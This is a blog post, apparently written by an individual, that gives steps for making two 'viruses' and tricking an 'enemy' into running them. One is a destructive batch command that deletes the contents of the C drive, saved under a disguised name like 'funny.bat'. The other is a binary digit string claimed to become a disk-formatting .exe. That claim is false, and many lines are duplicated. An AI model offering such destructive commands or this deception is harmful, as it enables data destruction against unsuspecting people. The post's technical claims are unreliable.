How to Create Computer Viruses in Simple Steps -
Hey friends,i am abhishek
Today after a long time i am here to assist you one important lesson of how to create a virus that can destroy your enemy's hard disk as well as its C drive.
I am going to explain Two types of viruses.
Today after a long time i am here to assist you one important lesson of how to create a virus that can destroy your enemy's hard disk as well as its C drive.
I am going to explain Two types of viruses.
1 - To Format Entire Hard disk
2 - To Format Entire C drive - (Attack on Windows)
2 - To Format Entire C drive - (Attack on Windows)
___________________________________________________________________________________
1 - Virus to Format Entire Hard Disk.
This virus will be created as Executable file. This is simple yet Powerful and Harmful virus for the computer that can format your whole hard disk.
Steps :
Steps :
Open the Notepad file.
Copy the below code and Paste it in the Notepad.
Copy the below code and Paste it in the Notepad.
01001011000111110010010101010101010000011111100000
Save the Notepad file with extention ".exe"
Example : funny.exe
Now the Virus is been created, send this file to your enemy and tell them to run. It will format it's whole hard disk. Enjoy!!
Example : funny.exe
Now the Virus is been created, send this file to your enemy and tell them to run. It will format it's whole hard disk. Enjoy!!
___________________________________________________________________________________
2 - Virus to Format "C" Drive.
This virus will be created using batch file programming. This is the simple yet powerfull you can also call it as a Harmfull computer virus that can delete all the content of C Drive. This is indirectly an attack on the Windows file.
Steps :
Steps :
Open the Notepad file
Copy the below code and paste it in the Notepad.
Copy the below code and paste it in the Notepad.
@Echo off
Del C:\ *.* |y
Save this Notepad file with extention ".bat"
Example : funny.bat
Example : funny.bat
Now this Virus is been created, running this virus can delete all the content in C drive. So send this to your enemy and tell them to run this file. Enjoy!!
Warning: Do not try to run this files on your own computer, i will not be for any damages occurred in your computer.
Comments
Post a Comment